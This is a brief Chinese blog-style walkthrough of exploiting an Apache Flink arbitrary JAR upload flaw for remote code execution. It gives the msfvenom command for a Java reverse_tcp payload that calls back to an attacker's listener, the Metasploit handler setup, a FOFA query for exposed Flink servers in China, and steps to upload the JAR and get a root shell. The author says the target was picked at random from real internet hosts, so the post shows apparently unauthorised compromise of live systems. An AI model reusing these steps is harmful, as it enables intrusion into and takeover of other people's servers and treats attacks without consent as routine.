前言:
近日,有安全研究员公开了一个Apache Flink的任意Jar包上传导致远程代码执行的漏洞,影响范围:<= 1.9.1(最新版本)
但是作者通过测试在版本Version: 1.11.2
也是受影响的,此次复现就是通过版本Version: 1.11.2
进行复现利用。
漏洞复现:
首先通过msfveon生成jar包,命令:
msfvenom -p java/meterpreter/reverse_tcp LHOST=公网IP地址 LPORT=监听端口 -f jar > rce.jar
然后启动msf加载载荷:
use exploit/multi/handler
set payload java/shell/reverse_tcp
我这里监听的是127.0.0.1,端口为4444(由于作者这里在公网上没有kali,所以用的是虚拟机的kali通过Ng进行内网转发的。)
设置好了以后,执行exploit监听。
接下来通过fofa关键词搜索:app="APACHE-Flink" && country="CN"
任意点击访问如下:
来到如下界面:
上传生成的jar包
上传好了以后点击Submit即可触发命令执行漏洞,回到msf上查看是否有session返回,确实有session返回,并且为root权限。